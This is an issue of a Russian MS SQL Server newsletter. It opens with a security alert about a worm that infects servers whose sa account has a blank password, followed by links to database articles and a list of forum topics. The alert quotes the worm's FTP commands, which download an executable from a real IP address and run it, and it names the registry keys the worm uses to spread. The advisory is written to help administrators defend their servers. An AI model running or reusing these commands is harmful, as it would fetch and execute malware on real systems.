Отправляет email-рассылки с помощью сервиса Sendsay

MS SQL Server

  Все выпуски  

MS SQL Server - дело тонкое...


Служба Рассылок Subscribe.Ru

#077<<  #078

БЕЗОПАСНОСТЬ

Вирусы - черви теперь нападают и на SQL Server
По материалам статьи Brian Knight на sqlservercentral.com: " Security Alert: SQL Server Worm Virus Attacking Systems"

Наблюдается новая тенденция в развитии вирусов, которые всё чаще нацелены на SQL Server. Это показывает хронология вирусных атак за последние несколько недель, когда новый вирус - червь использовал уязвимости SQL серверов. Атаке подвергались сервера баз данных, которые не имели установленного пароля для учетной записи sa и использовали смешанную SQL and Windows Authentication (Примечание: серверы, использующие только Windows Authentication, данной уязвимости не подвержены). Не смотря на то, что эта версия саморазмножающегося вируса-червя не способна распространяться слишком быстро, сам факт его появления вызывает тревогу и требует принятия соответствующих мер для защиты серверов баз данных в будущем.
Атака вируса начинается с регистрации на вашем сервере с инфицированного компьютера, с использование логина sa и пустого пароля. После успешного подключения, будут выполнены следующие команды:


ftp 207.29.192.160
user = ftp
password = foo.com
bin
cd pub
cd tmp
get dnsservice.exe
close
quit
start dnsservice.exe

С помощью этих команд, с IP адреса 207.29.192.160 будет загружен файл dnsservice.exe. В настоящее время этот файл был удален с ftp сайта, но вирус может подключиться и к другим серверам. После загрузки вирусом фала dnsservice.exe, он запускает его на исполнение и самоликвидируется, используя для этого команды xp_cmdshell.
После этого, вирус шлёт уведомление на ЧАТ сервер (IRC) с результатами выполненной проверки. Можно предположить, что создатели вируса просто хотели проверить, насколько успешной будет работа этой разновидности вируса.
Для определения списка серверов, на которых регистрировался атакуемый компьютер, вирус использует представленные ниже ключи системного реестра. После обнаружения в этих ключах необходимой информации, он пытается инфицировать указанные там сервера. Эти ключи содержат информацию о серверах, зарегистрированных вашим Enterprise Manager:

SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\
SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\

Инфицирование других компьютеров начнется со сканирования портов, для того, чтобы определить, какие из этих компьютеров он может инфицировать. Одна из неприятных особенностей этого вируса, это то, что он передает по сети часть вашей информации о сервере по IRC каналу.
Не ждите, что Microsoft выпустит заплату для этого вируса. Это не является уязвимостью Microsoft, поскольку инфицируются только серверы, где учетная запись sa установлена в null. Этот вирус не ориентирован только на серверы, которые находятся в Internet. Имеется виду, например то, что если я установлю SQL Server Personal Edition на своей машине, которая будет подключена к Internet, она может быть инфицирована точно так же, как и любые другие интернет - ресурсы. Этот вирус не поднял большого шума, и вряд ли мы встретим эту версию вируса когда-либо в будущем. Но следующие его версии, которые не будут базироваться на ftp публикации или IRC, могут стать для нас настоящей угрозой. Если у Вас всё ещё существуют SQL Server с пустым паролем sa, расценивайте появление этого вируса, как предупредительный выстрел... Будущие подобные вирусные атаки не будут настолько просто останавливаться.

ССЫЛКИ НА СТАТЬИ

Релевантность полнотекстового поиска: подход на основе построения терминологической базы документов
Автор: С.И. Моисеенко, А. Майстренко.
Мы исходим из того, что хранить документы в базе данных - излишняя роскошь. Достаточно хранить только ссылки (URL) на документы. Здесь, конечно, могут возникнуть непринципиальные в рассматриваемом контексте проблемы, связанные с изменением местоположения документов. Мы также считаем неэффективным сохранение в базе данных всего словарного множества документа, предлагаемого в работе [2], отдавая должное простоте реализации и быстродействию алгоритма индексирования... [подробнее]
Эффективное преобразование типов при работе с OLEDB
Автор: Юрий Кулешов.
В статье речь пойдёт о применении стандартных средств OLEDB к задачам безопасных и эффективных преобразований типов. Важность задач этого типа является следствием широкого распространения подхода, при котором в ряде крупных коммерческих продуктов в качестве библиотеки для работы с СУБД используется OLE DB... [подробнее]
Управление проектами ERP - ключ к успеху их реализации
Автор: Чарльз Треппер.
Системы планирования ресурсов предприятия – так называемые ERP-системы – коренным образом изменили всю работу высокотехнологичных организаций. Однако масштабы и сложность практической реализации таких технологий на практике предъявляют новые требования к управлению подобными проектами. У проблемы управления ERP-системами есть две стороны – человеческий фактор и технологический аспект. Пакет средств управления предприятием охватывает всю организацию, и его внедрение сказывается на работе едва ли не каждого служащего. Более того, в некоторых случаях руководитель проекта ERP просто не способен заранее предвидеть, кто именно попадет под влияние новых технологий, а это чревато весьма неприятными сюрпризами. Известен случай, когда ошибки в управлении такой системой попросту заблокировали поступление комплектующих на один из заводов по производству электронного оборудования и едва не привели к закрытию фирмы-производителя, расположенной на юго-востоке США... [подробнее]
Подготовка отчетов в Crystal Reports
Автор: Игорь Кузнецов.
Программное обеспечение Crystal Reports фирмы Seagate представляет собой инструмент для анализа и интерпретации информации, хранящейся в базе данных. Оно позволяет легко и быстро создать простые отчеты, а также имеет все необходимые инструменты для конструирования специализированных и сложных отчетов... [подробнее]
Запросы с индивидуальными счетчиками
Автор: Рас Уитни.
Запросы с индивидуальными счетчиками отличаются от запросов с обычным суммированием только тем, что для определения результата, относящегося к отдельным пунктам в используемой иерархии размерности, обязательно надо обращаться к информации, расположенной на самом нижнем уровне иерархии. К примеру, если подсчитывается количество различных товаров, закупленных в первом квартале, нельзя просто сложить товары, закупленные в январе, феврале и марте. Чтобы подсчитать суммарное значение для первого квартала, необходимо знать все товары, закупленные в каждый из этих месяцев, потому что необходимо исключить все дубликаты товаров, образовавшиеся при слиянии этих трех множеств. В этой статье я рассмотрю подходы с применением MDX, которыми можно воспользоваться при работе с SQL Server 7.0 OLAP Services или с SQL Server 2000 Analysis Services для решения задач, подобных описанным выше. Помимо этого я расскажу о новом свойстве Analysis Services, которое может существенно упростить решение таких задач. В основу этого материала легла техническая статья Амира Нетца (архитектора Microsoft OLAP Services) из серии "белых книг", которая посвящена анализу покупательской корзины товаров с применением OLAP Services. Анализ покупательской корзины обычно относится к видам анализа розничной торговли, где покупательской корзиной принято называть группу товаров, приобретаемых посетителем магазина за один раз (то есть за одну транзакцию). В своей статье Нетц рассматривает тот же самый материал, который разбирается в моей статье, но более глубоко... [подробнее]

ФОРУМ SQL.RU: САМЫЕ ПОПУЛЯРНЫЕ ТОПИКИ НЕДЕЛИ

Нумерация результатов SQL-запроса
О форуме SQL.RU
Откат в триггере?
немного не в тему но всетаки Delphi Mssql
Работа с картинками №2
Триггер срабатывает только на первый Insert
Репликация на дискетах или по мылу <
Изменение записи в триггере
2-ой сервис-пак. История продолжается.
Утилита для сравнения структур баз данных
помогите с backup базы данных
VB для MS SQL
А кто какие тулзы использует для работы с сервером, кроме QA и EM?
Merge репликация и кластеризованные индексы
Еще раз о merge репликации и GUID

ФОРУМ SQL.RU: ВОПРОСЫ ОСТАЛИСЬ БЕЗ ОТВЕТА

Вопрос по быстродействию,... курсоры или ..... (MS SQL 2000)
Определение рабочих дней и праздников
Обработка алертов - параметры ошибки
репликация слиянием
Помогите с защитой данных
Ошибка при работе с Views
Replication to Informix
Где бэкап?
Сугментированное представление
Relationships
ОШИБКИ в SQL 7.0 ПОСЛЕ установки SP 3
Merge Replication
Оптимизация FREETEXTTABLE
PowerDesigner или Rational Rose?
Перевод таблиц Btrive (Pervasive) в формат SQL
Полнотекстовый поиск
описание COLUMN'а

#077<<  #078

Вопросы, предложения, коментарии, замечания, критику и т.п. присылайте Александру на адрес: mssqlhelp@pisem.net

sql.ru

Описание рассылки
 Поиск на SQL.RU
Искать: 
Результатов на странице: Формат:
Тип запроса: Раздел:
МИНИФОРМА
ПОДПИСКИ




http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное